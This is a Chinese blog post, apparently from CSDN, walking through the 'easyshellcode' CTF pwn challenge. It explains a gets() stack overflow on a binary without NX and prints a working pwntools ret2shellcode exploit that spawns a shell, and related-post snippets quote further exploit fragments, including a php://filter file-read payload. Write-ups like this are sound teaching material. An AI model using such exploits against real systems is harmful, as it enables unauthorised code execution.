火种CTF PWN easyshellcode writeup

最新推荐文章于 2025-03-25 10:50:38 发布

0kam1

最新推荐文章于 2025-03-25 10:50:38 发布

阅读量1k

点赞数 1

分类专栏： CTF PWN 文章标签：信息安全

本文链接：https://blog.youkuaiyun.com/qq_41743240/article/details/105498593

版权

CTF 同时被 2 个专栏收录

12 篇文章

订阅专栏

PWN

5 篇文章

订阅专栏

检查一下程序保护机制

在这里插入图片描述

没有开启NX,也有RWX可读可写可执行的段
将程序拖入IDA

在这里插入图片描述
可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2
利用思路:
＊＊将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址
＊＊这样执行EIP的时候即是执行buf2里面的shellcode

获取到buf2的地址
在这里插入图片描述
exploit如下:

#coding:utf-8
from pwn import *

sh = process('./easyshellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804A060
sh.sendline(shellcode+"A"*(112-len(shellcode))+ p32(buf2_addr))
sh.interactive()

欢迎爱好CTF的小伙伴一起交流

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0kam1

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF——PWN——栈溢出（3.Easy_ShellCode）

qq_45215609的博客

09-18

814

CTF——PWN——栈溢出（3.Easy_ShellCode），bss段上的ret2shellcode

BUU CTF PWN rip WriteUp

m0sway的博客

02-25

5209

BUU CTF PWN题rip的WriteUp

1 条评论您还未登录，请先登录后发表或查看评论

【pwn学习】pwn中的简单shellcode

Morphy_Amo的博客

12-20

1385

编写简单的shellcode 在linux32位系统中，最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下： global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译

ctf网络安全大赛奖金，零基础入门到精通，收藏这一篇就够了

最新发布

2401_84618514的博客

03-25

876

网络安全产业就像一个江湖，各色人等聚集。相对于欧美国家基础扎实（懂加密、会防护、能挖洞、擅工程）的众多名门正派，我国的人才更多的属于旁门左道（很多白帽子可能会不服气），因此在未来的人才培养和建设上，需要调整结构，鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”，才能解人才之渴，真正的为社会全面互联网化提供安全保障。

火种 ctf_分析我的火种数据

weixin_26705191的博客

09-21

858

火种 ctfOriginally published at https://www.linkedin.com on March 27, 2020 (data up to date as of March 20, 2020). 最初于 2020年3月27日在 https://www.linkedin.com 上发布 (数据截至2020年3月20日)。 Day 3 of social dista...

Polar靶场的Easy_ShellCode

chinese_cabbage0的博客

03-01

191

在start中我们看到一个read和一个puts，read函数是存在缓冲区溢出的，这里生命的字符串是最大104位，但是read读取的是100个字节，我们找不到/bin/bash，所以查看str的bss，传入到bss中一个shellcode然后使用第二个read进行溢出。打开题目之后，我们下载附件，去检查文件是32还是64，这个是一个32的程序，然后我们来进行checksec来分析，分析出来没有任何的保护，使用IDA工具静态调试。打开后我们这里可以看到两个函数，我们通过分析两个函数找到漏洞利用的点。

2019火种CTF PWN writeup

qq_43189757的博客

11-23

957

1.lllheap 思路： UAF漏洞，程序限制了chunk的大小为0x80-0x200 之间，那么无法通过常规的fastbin attack来覆写malloc_hook , 但是可以通过改写global_max_fast 来扩大fastbin 的上限大小，再往_IO_stdin 附近写入0xf1作为跳板，伪造fake_chunk从而覆写malloc_hook exp: from pwn i...

Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp

m0sway的博客

03-04

494

Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp

ROP；CTF-pwn 详解writeup；one_gadget使用；静态库；静态链接

CHERRY_cong的博客

05-01

1402

ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图任务描述本实验提供了一个带有漏洞的二进制程序（ropme），这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用，在不需要额外操作标准输入的情况下，完成以下至少一项任务

CTF PWN专用虚拟机-附件资源

03-05

CTF PWN专用虚拟机-附件资源

[BUGKU][CTF][PWN][2020] PWN writeup

dadongwudi的博客

01-12

755

PWN1 关键字：nc 知识点：nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序，它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的，是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具，可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6，而且可以为用户提供无限的潜在用途。在nc的大量功能中，有能力将nc链接在一起；TCP、UDP和到其他站点的SCTP端口；支持

2016华山杯ctf安卓题目

06-17

2016年华山杯ctf安卓题目

CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode

12-10

CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目，该题目主要是利用三个节点来注入shellcode，考验解题人对shellcode的熟悉程度。题解：https://blog.youkuaiyun.com/A951860555/article/details/110350773

火种 ctf_如何在SwiftUI中实现火种刷卡

cullen2012的博客

09-10

279

火种 ctfSwiftUI for the first time — a totally new way of creating and working with UI elements in iOS and macOS (also iPadOS) apps. It felt like Christmas in the summer. It's new, it's declarative, it'...

2017 火种CTF Writeup

4ct10n

07-06

6357

趁着周日的时间打了个小比赛。。。。

Ichunqiu_Easypwn

钞sir的博客

01-28

4086

轮回池前彼岸花三生石旁那道疤擦不去的眼中莎泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法这道题是i春秋CTF的一道题，也是“百度杯”CTF比赛十二月场中的一道pwn，这道题比较简单我们先看看这道题的保护机制： sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...

[BUUCTF-pwn]——mrctf2020_shellcode

Y_peak的博客

03-19

353

[BUUCTF-pwn]——mrctf2020_shellcode 没开NX保护，发现F5不可以，就看汇编吧这不就是相当于你写入shellcode然后执行嘛 exploit from pwn import * p=remote("node3.buuoj.cn",26104) context.arch='amd64' shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive() ...

ctfshow 36d

blowed的博客

03-18

1909

36D练手赛不知所措easy shell36D杯给你shellWUSTCTF朴实无华RevengeALL_INFO_U_WANT你取吧 36D练手赛不知所措 $file 暗示参数为file 且url必须含有test ?file=php://filter/convert.base64-encode/resource=test/../index. 解码得到源代码 <?php error_reporting(0); $file=$_GET['file']; $file=$file.'ph.

Hgame-2023(前三周pwn题解)

weixin_73290593的博客

02-01

1383

hgame，真好玩